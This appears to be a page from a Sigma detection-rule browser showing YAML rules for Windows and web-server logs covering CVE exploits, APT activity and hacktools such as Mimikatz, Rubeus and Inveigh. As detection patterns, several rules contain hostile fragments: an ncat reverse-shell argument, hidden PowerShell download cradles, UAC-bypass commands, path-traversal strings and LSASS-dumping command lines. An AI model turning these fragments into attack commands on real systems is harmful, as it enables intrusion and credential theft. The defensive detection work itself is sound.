Tool
SIEM
Sigma (generic) detection rules
3,750 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
◈
Detection rules
50 shown of 3,750
critical
Exploit for CVE-2015-1641
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
view Sigma YAML
title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
- https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
- https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
- attack.stealth
- attack.t1036.005
- cve.2015-1641
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\WINWORD.EXE'
Image|endswith: '\MicroScMgmt.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Exploit for CVE-2017-8759
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
view Sigma YAML
title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
- https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
- https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
- attack.execution
- attack.t1203
- attack.t1204.002
- attack.initial-access
- attack.t1566.001
- cve.2017-8759
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\WINWORD.EXE'
Image|endswith: '\csc.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Exploiting CVE-2019-1388
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
view Sigma YAML
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
- https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
- attack.privilege-escalation
- attack.t1068
- cve.2019-1388
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
ParentImage|endswith: '\consent.exe'
Image|endswith: '\iexplore.exe'
CommandLine|contains: ' http'
selection_rights:
- IntegrityLevel:
- 'System' # for Sysmon users
- 'S-1-16-16384' # System
- User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: all of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
FlowCloud Registry Markers
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
view Sigma YAML
title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.emerging-threats
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains:
- '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
- '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
- '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
- '\SYSTEM\Setup\PrintResponsor\'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
FoggyWeb Backdoor DLL Loading
Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
view Sigma YAML
title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
- https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
- attack.resource-development
- attack.t1587
- detection.emerging-threats
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded: 'C:\Windows\ADFS\version.dll'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Fortinet CVE-2018-13379 Exploitation
Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
view Sigma YAML
title: Fortinet CVE-2018-13379 Exploitation
id: a2e97350-4285-43f2-a63f-d0daff291738
status: test
description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
references:
- https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
author: Bhabesh Raj
date: 2020-12-08
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- cve.2018-13379
- detection.emerging-threats
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains|all:
- 'lang=/../../'
- '/dev/cmdb/sslvpn_websession'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Fortinet CVE-2021-22123 Exploitation
Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
view Sigma YAML
title: Fortinet CVE-2021-22123 Exploitation
id: f425637f-891c-4191-a6c4-3bb1b70513b4
status: test
description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
references:
- https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
author: Bhabesh Raj, Florian Roth
date: 2021-08-19
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- cve.2021-22123
- detection.emerging-threats
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'
cs-method: POST
filter1:
cs-referer|contains: '/root/user/remote-user/saml-user/'
filter2:
cs-referer: null
condition: selection and not filter1 and not filter2
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Goofy Guineapig Backdoor Service Creation
Detects service creation persistence used by the Goofy Guineapig backdoor
view Sigma YAML
title: Goofy Guineapig Backdoor Service Creation
id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
status: test
description: Detects service creation persistence used by the Goofy Guineapig backdoor
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
tags:
- attack.persistence
- detection.emerging-threats
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ServiceName: 'GoogleUpdate'
ImagePath|contains|all:
- 'rundll32'
- 'FileProtocolHandler'
- '\ProgramData\GoogleUpdate\GoogleUpdate.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Grafana Path Traversal Exploitation CVE-2021-43798
Detects a successful Grafana path traversal exploitation
view Sigma YAML
title: Grafana Path Traversal Exploitation CVE-2021-43798
id: 7b72b328-5708-414f-9a2a-6a6867c26e16
status: test
description: Detects a successful Grafana path traversal exploitation
references:
- https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
- https://github.com/search?q=CVE-2021-43798
author: Florian Roth (Nextron Systems)
date: 2021-12-08
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- cve.2021-43798
- detection.emerging-threats
logsource:
category: webserver
detection:
selection_traversal:
cs-uri-query|contains: '/../../../../../../../'
sc-status: 200
selection_plugins:
cs-uri-query|contains:
- '/public/plugins/live'
- '/public/plugins/icon'
- '/public/plugins/loki'
- '/public/plugins/text'
- '/public/plugins/logs'
- '/public/plugins/news'
- '/public/plugins/stat'
- '/public/plugins/mssql'
- '/public/plugins/mixed'
- '/public/plugins/mysql'
- '/public/plugins/tempo'
- '/public/plugins/graph'
- '/public/plugins/gauge'
- '/public/plugins/table'
- '/public/plugins/debug'
- '/public/plugins/zipkin'
- '/public/plugins/jaeger'
- '/public/plugins/geomap'
- '/public/plugins/canvas'
- '/public/plugins/grafana'
- '/public/plugins/welcome'
- '/public/plugins/xychart'
- '/public/plugins/heatmap'
- '/public/plugins/postgres'
- '/public/plugins/testdata'
- '/public/plugins/opentsdb'
- '/public/plugins/influxdb'
- '/public/plugins/barchart'
- '/public/plugins/annolist'
- '/public/plugins/bargauge'
- '/public/plugins/graphite'
- '/public/plugins/dashlist'
- '/public/plugins/piechart'
- '/public/plugins/dashboard'
- '/public/plugins/nodeGraph'
- '/public/plugins/alertlist'
- '/public/plugins/histogram'
- '/public/plugins/table-old'
- '/public/plugins/pluginlist'
- '/public/plugins/timeseries'
- '/public/plugins/cloudwatch'
- '/public/plugins/prometheus'
- '/public/plugins/stackdriver'
- '/public/plugins/alertGroups'
- '/public/plugins/alertmanager'
- '/public/plugins/elasticsearch'
- '/public/plugins/gettingstarted'
- '/public/plugins/state-timeline'
- '/public/plugins/status-history'
- '/public/plugins/grafana-clock-panel'
- '/public/plugins/grafana-simple-json-datasource'
- '/public/plugins/grafana-azure-monitor-datasource'
condition: all of selection*
falsepositives:
- Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error
level: critical
Convert to SIEM query
critical
Greenbug Espionage Group Indicators
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
view Sigma YAML
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
- attack.stealth
- attack.g0049
- attack.execution
- attack.t1059.001
- attack.command-and-control
- attack.t1105
- attack.t1036.005
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- ':\ProgramData\adobe\Adobe.exe'
- ':\ProgramData\oracle\local.exe'
- '\revshell.exe'
- '\infopagesbackup\ncat.exe'
- ':\ProgramData\comms\comms.exe'
selection_msf:
CommandLine|contains|all:
- '-ExecutionPolicy Bypass -File'
- '\msf.ps1'
selection_ncat:
CommandLine|contains|all:
- 'infopagesbackup'
- '\ncat'
- '-e cmd.exe'
selection_powershell:
CommandLine|contains:
- 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
- '-nop -w hidden -c $k=new-object'
- '[Net.CredentialCache]::DefaultCredentials;IEX '
- ' -nop -w hidden -c $m=new-object net.webclient;$m'
- '-noninteractive -executionpolicy bypass whoami'
- '-noninteractive -executionpolicy bypass netstat -a'
selection_other:
CommandLine|contains: 'L3NlcnZlcj1' # base64 encoded '/server='
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Griffon Malware Attack Pattern
Detects process execution patterns related to Griffon malware as reported by Kaspersky
view Sigma YAML
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '\local\temp\'
- '//b /e:jscript'
- '.txt'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HAFNIUM Exchange Exploitation Activity
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
view Sigma YAML
title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
- https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
- https://twitter.com/GadixCRK/status/1369313704869834753?s=20
- https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1546
- attack.t1053
- attack.g0125
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_attrib:
CommandLine|contains|all:
- 'attrib'
- ' +h '
- ' +s '
- ' +r '
- '.aspx'
selection_vsperfmon:
- Image|contains: '\ProgramData\VSPerfMon\'
- CommandLine|contains|all:
- 'schtasks'
- 'VSPerfMon'
selection_opera_1:
Image|endswith: 'Opera_browser.exe'
ParentImage|endswith:
- '\services.exe'
- '\svchost.exe'
selection_opera_2:
Image|endswith: 'Users\Public\opera\Opera_browser.exe'
selection_vssadmin:
CommandLine|contains|all:
- 'vssadmin list shadows'
- 'Temp\__output'
selection_makecab_1:
Image|endswith: '\makecab.exe'
CommandLine|contains|all:
- 'inetpub\wwwroot\'
- '.dmp.zip'
selection_makecab_2:
Image|endswith: '\makecab.exe'
CommandLine|contains:
- 'Microsoft\Exchange Server\'
- 'compressionmemory'
- '.gif'
selection_7zip:
CommandLine|contains|all:
- ' -t7z '
- 'C:\Programdata\pst'
- '\it.zip'
selection_rundll32:
CommandLine|contains|all:
- '\comsvcs.dll'
- 'Minidump'
- 'full '
- '\inetpub\wwwroot'
selection_other:
CommandLine|contains:
- 'Windows\Temp\xx.bat'
- 'Windows\WwanSvcdcs'
- 'Windows\Temp\cw.exe'
condition: 1 of selection*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - BabyShark Agent Default URL Pattern
Detects Baby Shark C2 Framework default communication patterns
view Sigma YAML
title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
- https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-uri|contains: 'momyshark\?key='
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Credential Dumping Tools Named Pipe Created
Detects well-known credential dumping tools execution via specific named pipe creation
view Sigma YAML
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
- attack.credential-access
- attack.t1003.001
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName|contains:
- '\cachedump'
- '\lsadump'
- '\wceservicepipe'
condition: selection
falsepositives:
- Legitimate Administrator using tool for password recovery
level: critical
Convert to SIEM query
critical
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags
view Sigma YAML
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
- https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- ' /am51'
- ' /password'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - DiagTrackEoP Default Named Pipe
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
view Sigma YAML
title: HackTool - DiagTrackEoP Default Named Pipe
id: 1f7025a6-e747-4130-aac4-961eb47015f1
status: test
description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
references:
- https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
modified: 2023-08-07
tags:
- attack.privilege-escalation
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName|contains: 'thisispipe' # Based on source code
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
view Sigma YAML
title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
- id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
- https://github.com/outflanknl/Dumpert
- https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: 'dumpert.dmp'
condition: selection
falsepositives:
- Very unlikely
level: critical
Convert to SIEM query
critical
HackTool - Dumpert Process Dumper Execution
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
view Sigma YAML
title: HackTool - Dumpert Process Dumper Execution
id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
status: test
description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
references:
- https://github.com/outflanknl/Dumpert
- https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2025-01-22
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
- Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'
- CommandLine|contains: 'Dumpert.dll'
condition: selection
falsepositives:
- Very unlikely
level: critical
Convert to SIEM query
critical
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods
view Sigma YAML
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
- attack.privilege-escalation
- attack.t1548.002
- car.2019-04-001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
- ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
view Sigma YAML
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
- https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'rundll32.exe'
- '.dll'
- 'StartNodeRelay'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
HackTool - Inveigh Execution
Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
view Sigma YAML
title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
- https://github.com/Kevin-Robertson/Inveigh
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2023-02-04
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\Inveigh.exe'
- OriginalFileName:
- '\Inveigh.exe'
- '\Inveigh.dll'
- Description: 'Inveigh'
- CommandLine|contains:
- ' -SpooferIP'
- ' -ReplyToIPs '
- ' -ReplyToDomains '
- ' -ReplyToMACs '
- ' -SnifferIP'
condition: selection
falsepositives:
- Very unlikely
level: critical
Convert to SIEM query
critical
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts
view Sigma YAML
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\Inveigh-Log.txt'
- '\Inveigh-Cleartext.txt'
- '\Inveigh-NTLMv1Users.txt'
- '\Inveigh-NTLMv2Users.txt'
- '\Inveigh-NTLMv1.txt'
- '\Inveigh-NTLMv2.txt'
- '\Inveigh-FormInput.txt'
- '\Inveigh.dll'
- '\Inveigh.exe'
- '\Inveigh.ps1'
- '\Inveigh-Relay.ps1'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Koh Default Named Pipe
Detects creation of default named pipes used by the Koh tool
view Sigma YAML
title: HackTool - Koh Default Named Pipe
id: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
status: test
description: Detects creation of default named pipes used by the Koh tool
references:
- https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-08
modified: 2023-08-07
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.stealth
- attack.t1528
- attack.t1134.001
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName|contains:
- '\imposecost'
- '\imposingcost'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
view Sigma YAML
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
- id: 034affe8-6170-11ec-844f-0f78aa0c4d66
type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
- https://cobalt.io/blog/kerberoast-attack-techniques
- https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1558
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith:
- '.kirbi' # Kerberos tickets
- 'mimilsa.log' # MemSSP default file
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - PurpleSharp Execution
Detects the execution of the PurpleSharp adversary simulation tool
view Sigma YAML
title: HackTool - PurpleSharp Execution
id: ff23ffbc-3378-435e-992f-0624dcf93ab4
status: test
description: Detects the execution of the PurpleSharp adversary simulation tool
references:
- https://github.com/mvelazc0/PurpleSharp
author: Florian Roth (Nextron Systems)
date: 2021-06-18
modified: 2023-02-05
tags:
- attack.t1587
- attack.resource-development
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|contains: '\purplesharp'
- OriginalFileName: 'PurpleSharp.exe'
selection_cli:
CommandLine|contains:
- 'xyz123456.exe'
- 'PurpleSharp'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
view Sigma YAML
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains|all:
- '\AppData\Local\Temp\SAM-'
- '.dmp'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
HackTool - Rubeus Execution
Detects the execution of the hacktool Rubeus via PE information of command line parameters
view Sigma YAML
title: HackTool - Rubeus Execution
id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
related:
- id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
type: similar
status: stable
description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
references:
- https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus
- https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
- https://github.com/GhostPack/Rubeus
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-04-20
tags:
- attack.credential-access
- attack.t1003
- attack.t1558.003
- attack.lateral-movement
- attack.t1550.003
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\Rubeus.exe'
- OriginalFileName: 'Rubeus.exe'
- Description: 'Rubeus'
- CommandLine|contains:
- 'asreproast '
- 'dump /service:krbtgt '
- 'dump /luid:0x'
- 'kerberoast '
- 'createnetonly /program:'
- 'ptt /ticket:'
- '/impersonateuser:'
- 'renew /ticket:'
- 'asktgt /user:'
- 'harvest /interval:'
- 's4u /user:'
- 's4u /ticket:'
- 'hash /password:'
- 'golden /aes256:'
- 'silver /user:'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - SafetyKatz Execution
Detects the execution of the hacktool SafetyKatz via PE information and default Image name
view Sigma YAML
title: HackTool - SafetyKatz Execution
id: b1876533-4ed5-4a83-90f3-b8645840a413
status: test
description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
references:
- https://github.com/GhostPack/SafetyKatz
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-20
modified: 2023-02-04
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\SafetyKatz.exe'
- OriginalFileName: 'SafetyKatz.exe'
- Description: 'SafetyKatz'
condition: selection
falsepositives:
- Unlikely
